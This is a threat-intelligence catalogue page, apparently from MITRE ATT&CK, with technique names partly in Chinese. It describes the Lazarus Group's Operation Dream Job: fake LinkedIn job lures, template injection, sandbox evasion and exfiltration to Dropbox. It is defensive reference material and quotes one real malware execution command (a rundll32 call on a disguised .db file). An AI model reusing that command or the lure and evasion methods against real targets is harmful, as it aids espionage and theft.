1. Home
  2. Campaigns
  3. Operation Dream Job

Operation Dream Job

Operation Dream Job was a cyber espionage operation likely conducted by Lazarus Group that targeted the defense, aerospace, government, and other sectors in the United States, Israel, Australia, Russia, and India. In at least one case, the cyber actors tried to monetize their network access to conduct a business email compromise (BEC) operation. In 2020, security researchers noted overlapping TTPs, to include fake job lures and code similarities, between Operation Dream Job, Operation North Star, and Operation Interception; by 2022 security researchers described Operation Dream Job as an umbrella term covering both Operation Interception and Operation North Star.[1][2][3][4]

ID: C0022
First Seen:  September 2019 [3]
Last Seen:  August 2020 [1]
Associated Campaigns: Operation North Star, Operation Interception
Version: 1.2
Created: 17 March 2023
Last Modified: 11 April 2024

Associated Campaign Descriptions

Name Description
Operation North Star

[2][5]
Operation Interception

[3]

Groups

ID Name Description
G0032 Lazarus Group

[1][2][5][3]
Enterprise Layer
download view

Techniques Used

Domain ID Name Use
Enterprise T1047 Windows管理规范

During Operation Dream Job, Lazarus Group used WMIC to executed a remote XSL script.[3]
Enterprise T1220 XSL脚本处理

During Operation Dream Job, Lazarus Group used a remote XSL script to download a Base64-encoded DLL custom downloader.[3]
Enterprise T1005 从本地系统获取数据

During Operation Dream Job, Lazarus Group used malicious Trojans and DLL files to exfiltrate data from an infected host.[1][2]
Enterprise T1036 .008 伪装: Masquerade File Type

During Operation Dream Job, Lazarus Group disguised malicious template files as JPEG files to avoid detection.[2][3]
Enterprise T1656 伪装

During Operation Dream Job, Lazarus Group impersonated HR hiring personnel through LinkedIn messages and conducted interviews with victims in order to deceive them into downloading malware.[1][3][4]
Enterprise T1534 内部鱼叉式钓鱼

During Operation Dream Job, Lazarus Group conducted internal spearphishing from within a compromised organization.[1]
Enterprise T1573 .001 加密通道: Symmetric Cryptography

During Operation Dream Job, Lazarus Group used an AES key to communicate with their C2 server.[2]
Enterprise T1547 .001 启动或登录自动启动执行: Registry Run Keys / Startup Folder

During Operation Dream Job, Lazarus Group placed LNK files into the victims' startup folder for persistence.[2]

Enterprise T1059 .001 命令与脚本解释器: PowerShell

During Operation Dream Job, Lazarus Group used PowerShell commands to explore the environment of compromised victims.[3]
.003 命令与脚本解释器: Windows Command Shell

During Operation Dream Job, Lazarus Group launched malicious DLL files, created new folders, and renamed folders with the use of the Windows command shell.[3][2]
.005 命令与脚本解释器: Visual Basic

During Operation Dream Job, Lazarus Group executed a VBA written malicious macro after victims download malicious DOTM files; Lazarus Group also used Visual Basic macro code to extract a double Base64 encoded DLL implant.[1][2]
Enterprise T1584 .001 基础设施妥协: Domains

For Operation Dream Job, Lazarus Group compromised domains in Italy and other countries for their C2 infrastructure.[2][5]
.004 基础设施妥协: Server

For Operation Dream Job, Lazarus Group compromised servers to host their malicious tools.[1][3][2]
Enterprise T1071 .001 应用层协议: Web Protocols

During Operation Dream Job, Lazarus Group uses HTTP and HTTPS to contact actor-controlled C2 servers.[2]

Enterprise T1585 .001 建立账户: Social Media Accounts

For Operation Dream Job, Lazarus Group created fake LinkedIn accounts for their targeting efforts.[1][3]
.002 建立账户: Email Accounts

During Operation Dream Job, Lazarus Group created fake email accounts to correspond with fake LinkedIn personas; Lazarus Group also established email accounts to match those of the victim as part of their BEC attempt.[3]
Enterprise T1587 .001 开发能力: Malware

For Operation Dream Job, Lazarus Group developed custom tools such as Sumarta, DBLL Dropper, Torisma, and DRATzarus for their operations.[1][3][2][5]
.002 开发能力: Code Signing Certificates

During Operation Dream Job, Lazarus Group digitally signed their malware and the dbxcli utility.[3]
Enterprise T1560 .001 归档收集数据: Archive via Utility

During Operation Dream Job, Lazarus Group archived victim's data into a RAR file.[3]
Enterprise T1593 .001 搜索开放网站/域: Social Media

For Operation Dream Job, Lazarus Group used LinkedIn to identify and target employees within a chosen organization.[3]
Enterprise T1591 收集受害者组织信息

For Operation Dream Job, Lazarus Group gathered victim organization information to identify specific targets.[1]
.004 Identify Roles

During Operation Dream Job, Lazarus Group targeted specific individuals within an organization with tailored job vacancy announcements.[1][3]
Enterprise T1589 收集受害者身份信息

For Operation Dream Job, Lazarus Group conducted extensive reconnaissance research on potential targets.[1]
Enterprise T1083 文件和目录发现

During Operation Dream Job, Lazarus Group conducted word searches within documents on a compromised host in search of security and financial matters.[1]
Enterprise T1608 .001 暂存能力: Upload Malware

For Operation Dream Job, Lazarus Group used compromised servers to host malware.[1][3][2][5]
.002 暂存能力: Upload Tool

For Operation Dream Job, Lazarus Group used multiple servers to host malicious tools.[3]
Enterprise T1110 暴力破解

During Operation Dream Job, Lazarus Group performed brute force attacks against administrator accounts.[3]

Enterprise T1505 .004 服务器软件组件: IIS Components

During Operation Dream Job, Lazarus Group targeted Windows servers running Internet Information Systems (IIS) to install C2 components.[2]
Enterprise T1106 本机API

During Operation Dream Job, Lazarus Group used Windows API ObtainUserAgentString to obtain the victim's User-Agent and used the value to connect to their C2 server.[2]
Enterprise T1221 模板注入

During Operation Dream Job, Lazarus Group used DOCX files to retrieve a malicious document template/DOTM file.[1][2]
Enterprise T1027 .002 混淆文件或信息: Software Packing

During Operation Dream Job, Lazarus Group packed malicious .db files with Themida to evade detection.[1][2][5]
.013 混淆文件或信息: Encrypted/Encoded File

During Operation Dream Job, Lazarus Group encrypted malware such as DRATzarus with XOR and DLL files with base64.[1][3][2][5]
Enterprise T1204 .001 用户执行: Malicious Link

During Operation Dream Job, Lazarus Group lured users into executing a malicious link to disclose private account information or provide initial access.[1][3]
.002 用户执行: Malicious File

During Operation Dream Job, Lazarus Group lured victims into executing malicious documents that contained "dream job" descriptions from defense, aerospace, and other sectors.[1][2]
Enterprise T1070 .004 移除指标: File Deletion

During Operation Dream Job, Lazarus Group removed all previously delivered files from a compromised computer.[3]
Enterprise T1218 .010 系统二进制代理执行: Regsvr32

During Operation Dream Job, Lazarus Group used regsvr32 to execute malware.[3]
.011 系统二进制代理执行: Rundll32

During Operation Dream Job, Lazarus Group executed malware with C:\\windows\system32\rundll32.exe "C:\ProgramData\ThumbNail\thumbnail.db", CtrlPanel S-6-81-3811-75432205-060098-6872 0 0 905.[1][3][2]
Enterprise T1614 .001 系统位置发现: System Language Discovery

During Operation Dream Job, Lazarus Group deployed malware designed not to run on computers set to Korean, Japanese, or Chinese in Windows language preferences.[1]
Enterprise T1583 .001 获取基础设施: Domains

During Operation Dream Job, Lazarus Group registered a domain name identical to that of a compromised company as part of their BEC effort.[3]
.004 获取基础设施: Server

During Operation Dream Job, Lazarus Group acquired servers to host their malicious tools.[3]
.006 获取基础设施: Web Services

During Operation Dream Job, Lazarus Group used file hosting services like DropBox and OneDrive.[1]
Enterprise T1588 .002 获取能力: Tool

For Operation Dream Job, Lazarus Group obtained tools such as Wake-On-Lan, Responder, ChromePass, and dbxcli.[1][3]
.003 获取能力: Code Signing Certificates

During Operation Dream Job, Lazarus Group used code signing certificates issued by Sectigo RSA for some of its malware and tools.[3]

Enterprise T1497 .001 虚拟化/沙盒规避: System Checks

During Operation Dream Job, Lazarus Group used tools that conducted a variety of system checks to detect sandboxes or VMware services.[1]
.003 虚拟化/沙盒规避: Time Based Evasion

During Operation Dream Job, Lazarus Group used tools that collected GetTickCount and GetSystemTimeAsFileTime data to detect sandbox or VMware services.[1]
Enterprise T1622 调试器规避

During Operation Dream Job, Lazarus Group used tools that used the IsDebuggerPresent call to detect debuggers.[1]
Enterprise T1087 .002 账号发现: Domain Account

During Operation Dream Job, Lazarus Group queried compromised victim's active directory servers to obtain the list of employees including administrator accounts.[3]
Enterprise T1105 输入工具传输

During Operation Dream Job, Lazarus Group downloaded multistage malware and tools onto a compromised host.[1][3][2]
Enterprise T1041 通过C2信道渗出

During Operation Dream Job, Lazarus Group exfiltrated data from a compromised host to actor-controlled C2 servers.[1]
Enterprise T1567 .002 通过网络服务渗出: Exfiltration to Cloud Storage

During Operation Dream Job, Lazarus Group used a custom build of open-source command-line dbxcli to exfiltrate stolen data to Dropbox.[3][1]
Enterprise T1566 .001 钓鱼: Spearphishing Attachment

During Operation Dream Job, Lazarus Group sent emails with malicious attachments to gain unauthorized access to targets' computers.[1][2]
.002 钓鱼: Spearphishing Link

During Operation Dream Job, Lazarus Group sent malicious OneDrive links with fictitious job offer advertisements via email.[1][3]
.003 钓鱼: Spearphishing via Service

During Operation Dream Job, Lazarus Group sent victims spearphishing messages via LinkedIn concerning fictitious jobs.[1][3]
Enterprise T1053 .005 预定任务/作业: Scheduled Task

During Operation Dream Job, Lazarus Group created scheduled tasks to set a periodic execution of a remote XSL script.[3]
Enterprise T1553 .002 颠覆信任控制: Code Signing

During Operation Dream Job, Lazarus Group digitally signed their own malware to evade detection.[3]

Software

ID Name Description
S0694 DRATzarus

During Operation Dream Job, Lazarus Group used DRATzarus to deploy open source software and partly commodity software such as Responder, Wake-On-Lan, and ChromePass to target infected hosts.[1]
S0174 Responder

[1]
S0678 Torisma

During Operation Dream Job, Lazarus Group used Torisma to actively monitor for new drives and remote desktop connections on an infected system.[2][5]

References

  1. ClearSky Research Team. (2020, August 13). Operation 'Dream Job' Widespread North Korean Espionage Campaign. Retrieved December 20, 2021.
  2. Cashman, M. (2020, July 29). Operation North Star Campaign. Retrieved December 20, 2021.
  3. Breitenbacher, D and Osis, K. (2020, June 17). OPERATION IN(TER)CEPTION: Targeted Attacks Against European Aerospace and Military Companies. Retrieved December 20, 2021.
  1. Lakshmanan, R. (2022, August 17). North Korea Hackers Spotted Targeting Job Seekers with macOS Malware. Retrieved April 10, 2023.
  2. Beek, C. (2020, November 5). Operation North Star: Behind The Scenes. Retrieved December 20, 2021.